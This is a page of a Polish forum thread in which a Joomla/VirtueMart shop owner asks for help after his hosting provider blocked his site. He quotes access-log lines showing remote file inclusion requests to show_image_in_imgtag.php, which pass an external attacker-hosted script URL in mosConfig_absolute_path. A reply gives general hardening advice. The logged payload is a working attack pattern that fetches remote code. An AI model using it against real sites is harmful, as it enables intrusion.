Strona 2 z 2 PierwszyPierwszy 12
Wyniki 11 do 14 z 14

Temat: We have been hacked! - Niewinnie ale zawsze - Info

  1. #11
    Debiutant
    Dołączył
    12-07-2007
    Wpisy
    5
    Punkty
    10

    Domyślny

    Witam,

    sam mam chyba problem z tym mosConfig. Poinformowano mnie, że zablokowano dostęp do strony bo wykonywany był hidden perl script:

    Napotkany problem: Hidden PERL script
    Wykonywana komenda: /sbin/klogd -c 1 -x -x
    Uruchomiony plik: /usr/bin/perl
    Czas operacji: Tue May 12 16:05:13 CEST 2009
    logi pokazują takie coś:
    Kod:
    216.246.55.235 www.pieczatkarnia.pl - [12/May/2009:16:04:38 +0200] "GET /sklep//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/gspreads.txt??&modez=botz HTTP/1.1" 500 551 "-" "Mozilla/5.0"
    216.246.55.235 www.pieczatkarnia.pl - [12/May/2009:16:04:38 +0200] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/gspreads.txt??&modez=botz HTTP/1.1" 500 551 "-" "Mozilla/5.0"
    oraz jeszcze kilka takich linii po czym nastąpiła blokada ze strony operatora.

    Przyznam, że trochę mnie to przerasta, miałem to samo kilka dni temu, wykasowałem całą stronę z serwera, wgrałem kopię, ale nie minął tydzień i mam to samo.
    Wygląda na to, że jakoweś skrypty wykonują się zdalnie, za pomocą

    Kod PHP:
    show_image_in_imgtag.php?mosConfig_absolute_path 
    mam zainstalowana najnowszą joomlę z virtuemart a ta funkcja show_image_in_imgtag.php to jest w virtuemart, więc mam ja skasować? Bo żadnej nowszej wersji nigdzie nie ma?

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #12
    steelfox
    Gość

    Domyślny

    wyłącz obie linie które pokazujesz w logu i zobacz co będzie się działo (zaznacz je jako komentarz)

  4. #13
    Debiutant
    Dołączył
    12-07-2007
    Wpisy
    5
    Punkty
    10

    Domyślny

    Witam,

    co mam wyłączyć, te 2 linie są w logu, pokazują co było wykonywane i jak. Jedyne co mogę wyłączyć to funkcję show_image_in_imgtag.php ale wtedy jakaś funkcja w sklepie przestanie funkcjonować. No i pytanie czy tylko ta funkcja będzie podatna na ten atak czy jakas inna w której można podstawić MosConfig_absolute_patch - i jak temu zapobiec?

  5. #14
    steelfox
    Gość

    Domyślny

    1 - jeśli jeszcze nie masz to aktualizuj joomlę do najnowszej wersji.
    2 - kolejne zadanie dla Ciebie to lektura dzialu "sprawy bezpieczeństwa Joomla".
    3 - wiesz skąd to przyszło, zablokuj więc ten adres.
    4 - przeczytaj może coś na ten temat ma wydawca virtualmart'a
    5 - jeśli nie pomogło to czekaj na następną łatkę, a wcześniej zgłoś to na
    www.joomla.org

Strona 2 z 2 PierwszyPierwszy 12

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •